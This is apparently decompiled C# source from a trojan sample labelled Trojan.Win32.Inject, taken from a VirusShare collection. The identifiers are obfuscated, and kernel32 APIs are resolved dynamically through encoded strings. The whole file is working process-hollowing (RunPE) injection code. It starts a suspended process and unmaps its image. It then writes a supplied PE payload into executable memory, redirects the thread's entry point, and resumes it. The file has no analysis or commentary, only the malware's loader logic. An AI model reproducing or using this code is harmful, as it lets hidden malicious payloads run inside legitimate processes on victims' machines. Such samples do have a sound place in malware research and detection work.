// Decompiled with JetBrains decompiler // Type:  // Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe using System; using System.Runtime.InteropServices; internal class \uE00A { [DllImport("kernel32", EntryPoint = "GetProcAddress")] private static extern IntPtr \uE000(IntPtr _param0, string _param1); [DllImport("kernel32", EntryPoint = "GetModuleHandle")] private static extern IntPtr \uE000(string _param0); public static void \uE000(byte[] _param0, string _param1, string _param2) { \uE00A.\uE017 obj = new \uE00A.\uE017(); ref \uE00A.\uE017 local1 = ref obj; \uE00A.\uE01B structure1 = new \uE00A.\uE01B(); ref \uE00A.\uE01B local2 = ref structure1; \uE00A.\uE01E structure2 = new \uE00A.\uE01E(); ref \uE00A.\uE01E local3 = ref structure2; \uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014(); \uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015(); \uE00A.\uE01D lpContext = new \uE00A.\uE01D(); lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo); lpContext.\uE000 = 65543U; GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned); int int32 = gcHandle.AddrOfPinnedObject().ToInt32(); gcHandle.Free(); obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017)); structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B)); if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117) return; \uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009)); \uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B)); \uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C)); \uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A)); \uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D)); \uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E)); \uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F)); int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0; int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0; if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002)) return; int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0; for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1) { structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E)); byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003]; for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2) lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2]; int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0; } int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0; byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009); int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0; lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006; int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0; int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001); } private delegate bool \uE009( string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, \uE00A.\uE010 dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref \uE00A.\uE014 lpStartupInfo, out \uE00A.\uE015 lpProcessInformation); private delegate bool \uE00A( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, object lpNumberOfBytesWritten); private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress); private delegate bool \uE00C( IntPtr hProcess, IntPtr lpAddress, uint dwSize, \uE00A.\uE013 flAllocationType, \uE00A.\uE012 flProtect); private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext); private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext); private delegate uint \uE00F(IntPtr hThread); private enum \uE010 : uint { \uE00C = 1, \uE00B = 2, \uE009 = 4, \uE00D = 8, \uE002 = 16, // 0x00000010 \uE003 = 512, // 0x00000200 \uE00A = 1024, // 0x00000400 \uE007 = 2048, // 0x00000800 \uE008 = 4096, // 0x00001000 \uE00F = 65536, // 0x00010000 \uE005 = 262144, // 0x00040000 \uE00E = 524288, // 0x00080000 \uE000 = 16777216, // 0x01000000 \uE006 = 33554432, // 0x02000000 \uE001 = 67108864, // 0x04000000 \uE004 = 134217728, // 0x08000000 } private enum \uE011 : uint { \uE000 = 65536, // 0x00010000 \uE001 = 65536, // 0x00010000 \uE002 = 65537, // 0x00010001 \uE003 = 65538, // 0x00010002 \uE004 = 65540, // 0x00010004 \uE008 = 65543, // 0x00010007 \uE005 = 65544, // 0x00010008 \uE006 = 65552, // 0x00010010 \uE007 = 65568, // 0x00010020 \uE009 = 65599, // 0x0001003F } private enum \uE012 : uint { \uE004 = 1, \uE005 = 2, \uE006 = 4, \uE007 = 8, \uE000 = 16, // 0x00000010 \uE001 = 32, // 0x00000020 \uE002 = 64, // 0x00000040 \uE003 = 128, // 0x00000080 \uE008 = 256, // 0x00000100 \uE009 = 512, // 0x00000200 \uE00A = 1024, // 0x00000400 } private enum \uE013 : uint { \uE000 = 4096, // 0x00001000 \uE001 = 8192, // 0x00002000 \uE002 = 524288, // 0x00080000 \uE005 = 1048576, // 0x00100000 \uE006 = 2097152, // 0x00200000 \uE004 = 4194304, // 0x00400000 \uE003 = 536870912, // 0x20000000 } private struct \uE014 { public uint \uE000; public string \uE001; public string \uE002; public string \uE003; public uint \uE004; public uint \uE005; public uint \uE006; public uint \uE007; public uint \uE008; public uint \uE009; public uint \uE00A; public uint \uE00B; public short \uE00C; public short \uE00D; public IntPtr \uE00E; public IntPtr \uE00F; public IntPtr \uE010; public IntPtr \uE011; } private struct \uE015 { public IntPtr \uE000; public IntPtr \uE001; public uint \uE002; public uint \uE003; } private struct \uE016 { public int \uE000; public IntPtr \uE001; public bool \uE002; } private struct \uE017 { public ushort \uE000; public ushort \uE001; public ushort \uE002; public ushort \uE003; public ushort \uE004; public ushort \uE005; public ushort \uE006; public ushort \uE007; public ushort \uE008; public ushort \uE009; public ushort \uE00A; public ushort \uE00B; public ushort \uE00C; public ushort \uE00D; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] public ushort[] \uE00E; public ushort \uE00F; public ushort \uE010; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] \uE011; public int \uE012; } private struct \uE018 { public ushort \uE000; public ushort \uE001; public uint \uE002; public uint \uE003; public uint \uE004; public ushort \uE005; public ushort \uE006; } private struct \uE019 { public uint \uE000; public uint \uE001; } private struct \uE01A { public ushort \uE000; public byte \uE001; public byte \uE002; public uint \uE003; public uint \uE004; public uint \uE005; public uint \uE006; public uint \uE007; public uint \uE008; public uint \uE009; public uint \uE00A; public uint \uE00B; public ushort \uE00C; public ushort \uE00D; public ushort \uE00E; public ushort \uE00F; public ushort \uE010; public ushort \uE011; public uint \uE012; public uint \uE013; public uint \uE014; public uint \uE015; public ushort \uE016; public ushort \uE017; public uint \uE018; public uint \uE019; public uint \uE01A; public uint \uE01B; public uint \uE01C; public uint \uE01D; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public \uE00A.\uE019[] \uE01E; } private struct \uE01B { public uint \uE000; public \uE00A.\uE018 \uE001; public \uE00A.\uE01A \uE002; } private struct \uE01C { public uint \uE000; public uint \uE001; public uint \uE002; public uint \uE003; public uint \uE004; public uint \uE005; public uint \uE006; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] public byte[] \uE007; public uint \uE008; } private struct \uE01D { public uint \uE000; public uint \uE001; public uint \uE002; public uint \uE003; public uint \uE004; public uint \uE005; public uint \uE006; public \uE00A.\uE01C \uE007; public uint \uE008; public uint \uE009; public uint \uE00A; public uint \uE00B; public uint \uE00C; public uint \uE00D; public uint \uE00E; public uint \uE00F; public uint \uE010; public uint \uE011; public uint \uE012; public uint \uE013; public uint \uE014; public uint \uE015; public uint \uE016; public uint \uE017; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] public byte[] \uE018; } private struct \uE01E { [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] public byte[] \uE000; public uint \uE001; public uint \uE002; public uint \uE003; public uint \uE004; public uint \uE005; public uint \uE006; public ushort \uE007; public ushort \uE008; public uint \uE009; } }